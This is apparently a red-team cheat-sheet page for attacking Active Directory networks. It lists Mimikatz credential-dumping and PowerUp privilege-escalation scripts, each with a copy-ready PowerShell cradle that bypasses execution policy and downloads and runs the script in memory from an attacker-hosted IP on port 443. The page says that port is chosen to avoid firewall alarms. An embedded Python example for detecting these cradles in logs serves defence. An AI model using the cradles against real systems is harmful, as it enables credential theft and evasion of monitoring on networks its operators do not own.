Important Scripts & Links
These are some of the important scripts that may be useful to a Red Team while exploring a network with Active Directory. There is a major overlap with the previous section; the difference is that this is simply a list of scripts along with their usage and commands (where required), whereas the previous section is organised by need or requirement and the best script or command for each.
The heading of each tool gives a gist of its use, and each entry contains two parts:
Link to download the script
Command to download the script locally and execute it from memory
I have followed the method of downloading the scripts to a local repo and then using them in the PowerShell command to download & execute, since the targeted machines may not have internet.
I have also used 443 in the http link since I use either 80/443 for all such activities to avoid any alarms the firewall/IPS may raise. You can change it to the port from which you host the scripts.
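As an added example (not part of the original page), a small Python check a defender could run over PowerShell Script Block Logging text (Event ID 4104) or process command lines to flag the download-and-execute-from-memory cradle and the plain-HTTP-on-443 hosting described above; the sample records are constructed for this example.

```python
import re

# Constructed sample records (not real logs): record 0 is a process command line of the kind
# recorded by Sysmon/4688 and mirrors the cradle used on this page; the rest are script block
# texts of the kind recorded by PowerShell Script Block Logging (Event ID 4104).
SAMPLE_RECORDS = [
    'powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString(\'http://192.168.119.208:443/PowerUp.ps1\');Invoke-AllChecks"',
    "Get-ChildItem -Path C:\\Users | Select-Object Name",
    "iex (new-object net.webclient).downloadstring('http://10.0.0.5:80/a.ps1')",
    "Invoke-WebRequest https://example.invalid/update.ps1 -OutFile update.ps1",
]

# Indicators drawn from the technique described above:
#  - Invoke-Expression (alias IEX) wrapping Net.WebClient.DownloadString: fetch-and-run in memory
#  - a plaintext http:// URL on port 443: chosen to blend in, but anomalous because real 443 is TLS
#  - "-exec bypass" / "-ExecutionPolicy Bypass" on the powershell.exe command line
CRADLE = re.compile(
    r"\b(?:iex|invoke-expression)\b.*?new-object\s+(?:system\.)?net\.webclient\)?\.downloadstring\(",
    re.IGNORECASE,
)
HTTP_ON_443 = re.compile(r"http://[^/'\"\s]+:443/", re.IGNORECASE)
EXEC_BYPASS = re.compile(r"-(?:exec|executionpolicy|ep)\s+bypass\b", re.IGNORECASE)
ANY_URL = re.compile(r"https?://[^'\"\s)]+", re.IGNORECASE)


def classify(record: str) -> dict:
    """Return which indicators fired for one record, plus the first URL seen (for triage)."""
    url = ANY_URL.search(record)
    return {
        "in_memory_cradle": bool(CRADLE.search(record)),
        "plaintext_http_on_443": bool(HTTP_ON_443.search(record)),
        "exec_policy_bypass": bool(EXEC_BYPASS.search(record)),
        "url": url.group(0) if url else None,
    }


def suspicious_records(records):
    """Keep (record, findings) pairs where at least one indicator fired, in input order."""
    hits = []
    for record in records:
        findings = classify(record)
        if any(v for k, v in findings.items() if k != "url"):
            hits.append((record, findings))
    return hits


if __name__ == "__main__":
    for record, findings in suspicious_records(SAMPLE_RECORDS):
        fired = [k for k, v in findings.items() if k != "url" and v]
        print(f"{', '.join(fired)} -> {findings['url']}")
```

Script Block Logging has to be enabled by Group Policy before 4104 events exist to search; the URL the check extracts is what you would hand to network monitoring to find the host serving the scripts.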
Scripts
Invoke-MassMimikatz.ps1 # Dump Credentials on remote host
https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.121:443/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"
Invoke-Mimikatz.ps1 # Dump Credentials from Memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.208:443/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
PowerUp.ps1 # Privilege Escalation Checks
https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.208:443/PowerUp.ps1');Invoke-AllChecks"
Links
https://gist.github.com/ssstonebraker/a1964b2f20acc8edb239409b6c4906ce